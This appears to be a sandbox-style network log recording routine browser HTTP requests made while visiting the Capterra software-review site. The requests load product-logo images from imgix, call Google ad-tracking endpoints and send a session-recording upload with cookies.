Source: global traffic HTTP traffic detected: GET /ProductLogo/9f57a44f-9475-4cc5-9886-3822c18b54d1.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/67711109-055d-46d1-bf60-43ba35ef896d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034620739&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfodvXHpcqioDfHrEmWKpzoLF8fM3tgF1U4kWr-cgKjSuVr1zR&random=2234944505&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/7af09000-3e24-45a2-815f-7ccb9c0dcc7e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f0d90c26-fb48-482e-bfed-fd16809bc437.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/442879c8-fca4-4a7c-b165-49dc05cf7999.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/8d54c31f-ffb8-435c-9795-73330c5d470c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/ed3785e7-b737-401b-819f-b042945c26a2.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/505b4ccb-8f48-405a-bd30-39a80ed24293.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/4e2671a7-72b7-4638-9434-190c249607a3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/7af09000-3e24-45a2-815f-7ccb9c0dcc7e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/69d55a02-59f1-4cbf-aabd-353fd6b19bca.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/9efb2a2f-43b2-4ebd-bf24-b9bb46bd93c6.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034620739&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfodvXHpcqioDfHrEmWKpzoLF8fM3tgF1U4kWr-cgKjSuVr1zR&random=2234944505&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/6571081c-36c2-42ed-9ae6-ffbf5ed12e58.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/505b4ccb-8f48-405a-bd30-39a80ed24293.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/0a941fc9-5fda-4010-807b-044a6d6ff89b.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/1169750b-93b3-4296-9407-d5f4cc984d40.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/4e2671a7-72b7-4638-9434-190c249607a3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/69d55a02-59f1-4cbf-aabd-353fd6b19bca.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/df25f33b-71a1-46b2-8520-02d04ac23097.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/9efb2a2f-43b2-4ebd-bf24-b9bb46bd93c6.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fsrelay/rec/bundle/v2?OrgId=18VAT4&UserId=da9f39f7-d4a4-45f4-948f-86299cb47816&SessionId=084a7745-8adb-4b14-adf2-26e4e4ddbd6e&PageId=e2e5b10c-4bbc-4510-b497-529b569fdc46&Seq=1&ClientTime=1725034627669&PageStart=1725034624939&PrevBundleTime=0&LastActivity=2369&IsNewSession=true&ContentEncoding=gzip HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /ProductLogo/6571081c-36c2-42ed-9ae6-ffbf5ed12e58.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/08d2adc0-b055-41c3-9caa-981ebab6ae4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/27a50d30-49b3-4fb0-902d-34d05a775b15.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/0c617aed-05cb-4242-a1ed-7a7e79c76fb7.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/713f882b-f7a1-4f3f-a484-7af2fe13f5c3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f2e2e04e-14be-474e-8d90-7162080c28b0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/0a941fc9-5fda-4010-807b-044a6d6ff89b.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/1169750b-93b3-4296-9407-d5f4cc984d40.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/35e9db05-94a1-4859-b307-858b9d3946cb.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/df25f33b-71a1-46b2-8520-02d04ac23097.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/0c617aed-05cb-4242-a1ed-7a7e79c76fb7.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f2e2e04e-14be-474e-8d90-7162080c28b0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/670d76a5-76f8-4742-a6f9-a42d167cc69d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/7780d136-e630-42e5-adce-8f580dc09687.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/27a50d30-49b3-4fb0-902d-34d05a775b15.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
